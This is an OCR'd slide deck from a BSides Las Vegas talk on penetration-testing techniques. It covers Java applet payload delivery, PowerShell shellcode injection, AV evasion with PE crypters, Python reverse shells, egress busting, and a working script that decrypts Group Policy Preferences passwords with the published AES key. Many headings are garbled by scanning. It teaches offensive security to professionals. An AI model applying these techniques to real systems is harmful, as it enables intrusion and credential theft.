BSIDES Las Vegas

Secret Pentesting Techniques Shhh...

Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
@TrustedSec
lnLroducuon

As penetration testers, exploit
writers, huggers, etc. we have
secret techniques we always
use.
Although some may or may
not be public, they are
generally obscure and not well
known.

The purpose of todays talk is
to show you my secrets..
Some of my techniques that I
use that arent widely known.
Why show you? Im an open
book on everything I do and
sharing is what its all about.
1echnlque #1

Java Applet Attack (SET) Well
known attack method right?
Do you know how it actually
works?
Do you know the techniques
behind it to make it successful?
ZCMC A1

News agencies around the
world discovered a new and
extremely advanced zero-day
exploit against Java.
Made me feel kind of special =)
How people found out it was
set?
lLlkLPuCS
DEMO:

Walking through the Attack
Lxplalnlng Lhe AppleL

Parameters that are
injected into the HTML
code are pulled from the
Applet.
Obfuscated and
randomized each time.
Parameters tell the Applet
which attacks to use.
MeLhod 1 - 8lnary uropper

Binary is downloaded from attacker machine via web server (Java
downloader)
Obfuscated binary each time per deployment.. Combination of PE
manipulation, UPX, and rewriting binary on y (import pele)

DEMO:

Binary Dropping Technique
MeLhod 1 - Weak Sauce

Binarys are easily picked up
by AV if signatures focus on
obfuscation techniques. (SET
changes them each version)
Direct interaction with
Windows le system and
writing to disk.
Multiple points of evidence
on victim machine.
MeLhod 2 - Shellcodeexec

Shellcodeexec method drops a
custom compiled and modied
version of shellcodeexec by
Bernardo Damele.
Executable takes int main(int argc,
char*argv[]) parameter for
alphanumeric shellcode. Uses
VirtualAlloc for read, write, and
execute memory space.
Alphanumeric shellcode is
executed in memory and payload
is delivered.
DEMO:

ShellcodeExec
MeLhod 2 - Laslly deLecLable

Shellcodeexec is a simple yet
awesome method but still has a
number of drawbacks.
Like Method 1 Binarys can be
picked up unless custom version
created. Direct interaction with
Windows le system and writing
to disk.
Like Method 1 - Multiple points
of evidence on victim machine.
MeLhod 3 - owershell ln[ecuon

Detect if Powershell is installed
(installed by default on Vista
and Windows 7 and 8).
Powershell gives us complete
exibility on a number of post
exploitation situations.
Technique discovered by
Matthew Graeber (you rock).

MeLhod 3 - S ShellCode ln[ecuon

Applet detects if powershell
is installed on system.
Grabs the operating system
type (x86 / x64)
Deploys Shellcode straight
through powershell.
DEMO:

ShellcodeExec
MeLhod 3 - owershell ln[ecuon

Never touches disk AV /
HIPS signatures go out the
door.
Obfuscated each time so that
memory inspection is
extremely dicult.
Extremely reliable and stable.
PE Security Evasion
Scenarlo 1 - uropplng L's llke lLs hoL

Your using Metasploit All of
them are being picked up by
AV, HIPS, etc.
Most cases, I will rewrite the
exe template for Metasploit
to customize binary for
evasion.
Couple cool ways to do this.
Modlfylng L lor Lvaslon ln MSl

Easiest way for me is to make
a simple program that
creates a RWX process then
have the program execute
Metasploit Shellcode.

You can also modify the
Metasploit exe.rb template
and obfuscate the code that
way.
L CrypLers

One of my favorites was
recently released called
Hyperion (Christian Ammann
from nullsecurity.net).
Encrypts PE the le using a
randomized simple cipher key
with AES 128.
When executable is run, it
brute forces the AES key then
decrypts the PE le for you.
DEMO: Hyperion
Pyperlon Lncrypuon

Very cool concept and easy
to use and write one for
yourself.
Ability to have a
completely unique PE le
each time.
Slight downfall, stub used
for brute force is not
polymorphic.
Building a Simple Reverse Shell
1he 8everse Shell
Connects out to the attacker (reverse shell).
Complllng 8lnarles
PyInstaller Compiles python code for you into a binary by
wrapping the Python Interpreter into the executable.
Works on Linux, OSX, and Windows.
python Congure.py
python Makespec.py onele noconsole shell.py
python Build.py shell/shell.spec
cd shell\dist

Maklng lL easy - pybulld.py
All code and samples will be released on the TrustedSec
website soon.

DEMO: Building a Shell
8ypasslng Av
Finding your way home
8umplng Lhe llrewall

A number of companies
restrict ports outbound
and only allow whats
needed for the business.
Trouble getting payloads
out, especially if you only
have one shot.
Lgress 8usung

Few ways to do it, pre-staged
payload for identifying way out.
Attempt staged reverse on every
port.
Metasploit has an ALLPORTS
payload as well.
Lgress 8usLer 0.2

Server/Client situation where
victim connects out on every
port 1024 ports at a time.
Server listens for connection and
reports back.
Heres where you can have some
fun.
Egress Buster Reverse Shell
Lgress 8usLer 8everse Shell

Released this week!
Allows you to bust all ports
inside the rewall and spawn a
command shell.
Custom, so no AV picks this up.
Byte compiled into an
executable.
DEMO:

Egress Buster Reverse Shell
Lgress 8usLer 8everse Shell usage

Recent Penetration Test Found
le upload + execute binarys.
Could not nd a standard port
out i.e. 80, 443, 53, 25, etc.
Wrote this to deploy and found
several obscure ports that were
allowed.
Fun with Group Policy
Cne of my L8SCnAL lavorlLes

How many times have we been on a
pentest with just a domain user?
Need that local administrator account
for all of the domain computers?
Research from: Sogeti ESEC Pentest

Article: http://esec-pentest.sogeti.com/
exploiting-windows-2008-group-policy-
preferences
1he Auack

Navigate to a domain controller
and hit up the SYSVOL share.
Head to the domain name and
Policies folder.
Look for a GUID then MACHINE
\Preferences\Group.
Look for the Groups.xml le.
ConLenLs of llle
SLauc key for ALS Anyone?
yLhon Code
# code was developed and created from
# http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences

from Crypto.Cipher import AES
from base64 import b64decode

key = """
4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
""".replace(" ","").replace("\n","").decode('hex')

cpassword = b64decode("j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw=")

o = AES.new(key, 2).decrypt(cpassword)

print o[:-ord(o[-1])].decode('utf16')
uecrypLed assword



>>> print o[:-ord(o[-1])].decode('utf16')
Local*P4ssword!
Expanding on Group.xml
More asswords SLored

The folks over at rewt dance (
http://rewtdance.blogspot.com/
2012/06/exploiting-windows-2008-
group-policy.html) found a few
more areas that store passwords
using the cpassword attribute.
Services, ScheduledTasks, SQL
servers and much more are
impacted.

LlsL of CLher AecLed Areas (from rewL
dance)
Services\Services.xml
http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13)

ScheduledTasks\ScheduledTasks.xml
http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13)
http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13)

Printers\Printers.xml
http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13)

Drives\Drives.xml
http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13)

DataSources\DataSources.xml
http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)

Theres a ton more of these

Hopefully can make these a series.
uownloads
For the code and tools used in this presentation, head
over to https://www.trustedsec.com and click on the
Downloads.

Secret Pentesting Techniques Shhh...

Dave Kennedy
Founder, Principal Security Consultant
Email: davek@trustedsec.com
https://www.trustedsec.com
TrustedSec, LLC
@TrustedSec